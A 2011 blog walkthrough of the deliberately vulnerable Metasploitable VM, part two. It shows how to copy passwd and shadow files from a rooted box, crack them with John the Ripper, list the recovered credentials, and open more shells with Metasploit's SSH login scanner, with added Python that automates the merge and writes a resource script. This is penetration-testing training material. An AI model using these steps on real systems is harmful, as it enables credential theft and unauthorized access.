Metasploitable Guide Part 2 : Easy Shells

Posted: November 20, 2011 in Guides

For those of you who are new to the Metasploitable guide, a multi-part walk-through of Metasploitable (a deliberately vulnerable VM produced by Rapid7): you may wish to read part one of the guide first, as this section assumes it has been completed. This part uses John the Ripper, so if you don't have it installed you may wish to do so now.

Now I know most of you are thinking: we rooted the box in the last guide, so we won, right? Well, yes, if you're a cracker kid on the Internet and someone was dumb enough to put something that insecure on a public network, you won. But this is about exploiting the system to the fullest, because in the end this is nothing but practice for a live engagement. You can't drop a pentest report in front of someone that says "You suck, here's a bunch of logs from Nessus." Well, you could, but it definitely wouldn't conform to the PTES (Penetration Testing Execution Standard). So for the sake of completeness we need to exploit EVERY vulnerability. Face it, rooting a box is easy. Taking what you did and turning it into actionable information, that's the difficult part.

Note: For this I'm using BackTrack 5; to follow along you need, at a minimum, John the Ripper, Nmap and Metasploit installed.

Let’s Crack Some Passwords

If you remember, we left off last time with a root shell on the Metasploitable box from exploiting the username map script vulnerability in Samba 3.0.20. At the end of that guide I said you should grab a copy of the /etc/shadow- and /etc/passwd files. If you haven't done that, do so now.

Note: for the purposes of this guide, I'm placing the two files in /root/ms/passwd and /root/ms/shadow-

Unshadow Utility

Now that we have the shadow and passwd files we want to use, we're going to run the unshadow utility that ships with John the Ripper to create an unshadowed password file, i.e. the passwd entries with each "x" replaced by the account's hash from shadow (I know... novel concept, huh?)

unshadow /root/ms/passwd /root/ms/shadow- > /root/ms/unshadowed

Will suffice.

John the Ripper

After this we can check for weak passwords. Run john against the unshadowed file first (with no options it starts in "single crack" mode, which tries each login name and the GECOS words as the password, so accounts whose password equals their username fall in seconds), then ask it to show what it cracked. Note that john --show on its own only lists passwords already recovered in john's pot file; it does not crack anything.

john /root/ms/unshadowed
john --show /root/ms/unshadowed

So now we have a few more accounts, which are (in username:password format):

  • msfadmin:msfadmin
  • postgres:postgres
  • user:user
  • service:service

Note: If you're so inclined you can repeat this process with /etc/shadow rather than /etc/shadow-, and you'll pick up the passwords for the klog:123456789 and sys:batman accounts as well. (/etc/shadow- is the backup the shadow utilities keep of the previous version of the file, so it predates the most recent password changes.) You can do this by running the following:

unshadow /root/ms/passwd /root/ms/shadow > /root/ms/unshadowed2
john /root/ms/unshadowed2
john --show /root/ms/unshadowed2

Getting Some SSH Shells

Now that we have some new credentials, we can grab a few more shells on the system. We're going to do this with Metasploit's SSH login scanner, auxiliary/scanner/ssh/ssh_login. If you recall from our Nmap scan, the server was running an SSH service. To streamline this process I placed our new usernames into a file called credentials in the /root/ms directory, which is what the module's USER_FILE option takes. Since each username and password were the same, we don't need a separate wordlist: the module's USER_AS_PASS option tries each username as its own password.

After we run the SSH login module we should end up with three additional sessions; at this point we should have something like this.
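The unshadow-and-crack steps above and the SSH login stage, as an added example that is not code from the original post: the Python below reproduces what unshadow does, filters the merged entries down to accounts that are both unlocked and able to log in (so you don't waste time on locked or nologin accounts), generates username-derived guesses in the spirit of john's single-crack mode, and emits an msfconsole resource script for auxiliary/scanner/ssh/ssh_login with USER_AS_PASS set. The passwd/shadow lines are constructed to look like Metasploitable's files with placeholder hashes, and the 192.0.2.10 target address is an assumption; the actual hash cracking is still john's job.

```python
"""Added example, not code from the original post: an unshadow-style merge,
a filter for accounts worth cracking, single-mode style guesses, and an
msfconsole resource script for the SSH login scanner."""
import re

# Constructed sample in /etc/passwd and /etc/shadow layout. The hash
# strings are placeholders, not Metasploitable's real hashes.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
"""

SHADOW = """\
root:$1$saltroot$PLACEHOLDERHASH0000000:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sshd:*:14684:0:99999:7:::
games:!$1$saltgame$PLACEHOLDERHASH0000005:14684:0:99999:7:::
msfadmin:$1$saltmsfa$PLACEHOLDERHASH0000001:14684:0:99999:7:::
postgres:$1$saltpost$PLACEHOLDERHASH0000002:14685:0:99999:7:::
user:$1$saltuser$PLACEHOLDERHASH0000003:14699:0:99999:7:::
service:$1$saltserv$PLACEHOLDERHASH0000004:14715:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def unshadow(passwd_text, shadow_text):
    """Merge like JtR's unshadow: each passwd line with field 2 replaced
    by the matching shadow hash. Returns the merged lines."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            name, hash_ = line.split(":", 2)[:2]
            hashes[name] = hash_
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def is_crackable(fields):
    """True only for a real hash on an account that can log in.
    '*' or '!' (also '!' prefixed to a hash, as passwd -l writes) means
    locked; a nologin/false shell gives no SSH session even if cracked."""
    hash_, shell = fields[1], fields[6]
    locked = not hash_ or hash_[0] in "*!"
    return not locked and shell not in NOLOGIN_SHELLS


def crackable_accounts(unshadowed_lines):
    """(username, gecos) pairs for the entries worth john's time."""
    out = []
    for line in unshadowed_lines:
        fields = line.split(":")
        if is_crackable(fields):
            out.append((fields[0], fields[4]))
    return out


def single_mode_candidates(username, gecos=""):
    """Guesses in the spirit of john's single-crack mode: the login name
    and GECOS words with simple manglings. This is why user:user and
    msfadmin:msfadmin fall before any wordlist is needed."""
    words = [username] + [w for w in re.split(r"[ ,]+", gecos) if w]
    cands = []
    for w in words:
        for c in (w, w.lower(), w.capitalize(), w.upper(), w[::-1], w + "1", w + "123", w * 2):
            if c not in cands:
                cands.append(c)
    return cands


def ssh_login_resource(rhosts, user_file, threads=4):
    """msfconsole resource script for auxiliary/scanner/ssh/ssh_login.
    USER_AS_PASS tries each username as its own password, so no PASS_FILE."""
    return "\n".join([
        "use auxiliary/scanner/ssh/ssh_login",
        f"set RHOSTS {rhosts}",
        f"set USER_FILE {user_file}",
        "set USER_AS_PASS true",
        f"set THREADS {threads}",
        "run",
    ]) + "\n"


if __name__ == "__main__":
    accounts = crackable_accounts(unshadow(PASSWD, SHADOW))
    for name, gecos in accounts:
        print(f"{name}: first guesses {single_mode_candidates(name, gecos)[:4]}")
    print("--- USER_FILE contents (one login per line) ---")
    print("\n".join(name for name, _ in accounts))
    print("--- ssh_login.rc (target address is an assumption) ---")
    print(ssh_login_resource("192.0.2.10", "/root/ms/credentials"), end="")
```

Save the resource script and run it with msfconsole -r ssh_login.rc; the USER_FILE written from the crackable list is the same one-login-per-line format the module expects.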


Next time we’ll discuss profiling and exploiting the remaining services running on the system.


  2. wibbs says:

    This is a great tutorial. Loving it. Can you explain how exactly we are supposed to get the copies of the shadow file and the passwd file onto our local Metasploit machine after we have exploited the box? scp still requires valid credentials, which we don't technically have yet. Thanks!

  3. wibbs says:

    ooooh. gotcha. great. thanks!
